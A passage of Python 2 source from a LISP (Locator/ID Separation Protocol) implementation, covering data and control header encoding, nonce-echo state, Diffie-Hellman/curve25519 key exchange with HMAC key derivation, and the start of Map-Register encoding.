flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
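#
# Illustrative example (not called by this code): encoding a data header
# with nonce 0x123456 and instance-id 1000 sets the N- and I-bits, so
# print_header() shows flags "NlevIpkk", with the nonce in the low-order
# 24 bits of the first long and the iid in the high-order 24 bits of the
# second long.
#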
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start request-nonce mode with a new nonce. If a request-nonce is
# already stored, use the same nonce as last time regardless of
# whether we received an echo response. A set high-order bit tells
# the caller to set the E-bit in the header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long it's been since the last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happened so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
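#
# Toy example of the classic DH exchange above (illustrative only,
# insecure sizes): with g=5, p=23, and private key 6, the public key
# is (5**6) % 23 = 8.
#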
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher-suite value, then insert key-length and public-key
# material. Do not negotiate the ECDH 25519 cipher suites if the
# curve25519 library is not installed on this system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according to the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
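#
# lisp_example_derive_keys()
#
# Editor's sketch, not part of the protocol code: the key-derivation done
# by compute_shared_key() above reduces to a single HMAC over a fixed
# context string, split into a 128-bit encrypt-key and a 128-bit icv-key.
# hashlib.sha256 stands in here for the negotiated hash algorithm.
#
def lisp_example_derive_keys(shared_key, local_pub, remote_pub):
    import hashlib

    data = lisp_hex_string(shared_key)
    context = "0001" + "lisp-crypto" + lisp_hex_string(local_pub ^
        remote_pub) + "0100"

    key_material = hmac.new(context, data, hashlib.sha256).hexdigest()
    key_material = int(key_material, 16)

    #
    # Upper 128 bits encrypt, lower 128 bits ICV, as in compute_shared_key().
    #
    ek = (key_material >> 128) & LISP_16_128_MASK
    ik = key_material & LISP_16_128_MASK
    return([lisp_hex_string(ek).zfill(32), lisp_hex_string(ik).zfill(32)])
#enddef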
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
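#
# lisp_example_queue_packet() / lisp_example_dequeue_packet()
#
# Editor's usage sketch, hypothetical helpers: a pcap thread hands packets
# to a worker by pushing onto lisp_thread.input_queue and the worker blocks
# on get(). This shows the intended hand-off only.
#
def lisp_example_queue_packet(lthread, packet):
    lthread.input_queue.put(packet)
#enddef
def lisp_example_dequeue_packet(lthread):
    return(lthread.input_queue.get())
#enddef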
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
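#
# lisp_example_control_type()
#
# Editor's sketch: the message type of any LISP control message is the
# high-order 4 bits of the first byte, exactly as lisp_control_header.
# decode() extracts it above.
#
def lisp_example_control_type(packet):
    if (len(packet) < 1): return(None)
    typeval = struct.unpack("B", packet[0:1])[0]
    return(typeval >> 4)
#enddef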
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is one of 8 values that identifies the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted, the
# entire message, not including the first 4 bytes, is chacha20-encrypted.
# The e-bit must be set by the ETR to indicate that the Map-Register was
# encrypted.
#
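# Editor's sketch before the class: pulling the e-bit and the 3-bit kid out
# of the (host byte-order) first long of a Map-Register, mirroring the
# decode() logic below. Returns None when the message is not encrypted.
#
def lisp_example_map_register_kid(first_long):
    if ((first_long & 0x2000) == 0): return(None)
    return((first_long >> 14) & 0x7)
#enddef
#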
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute the hash later.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
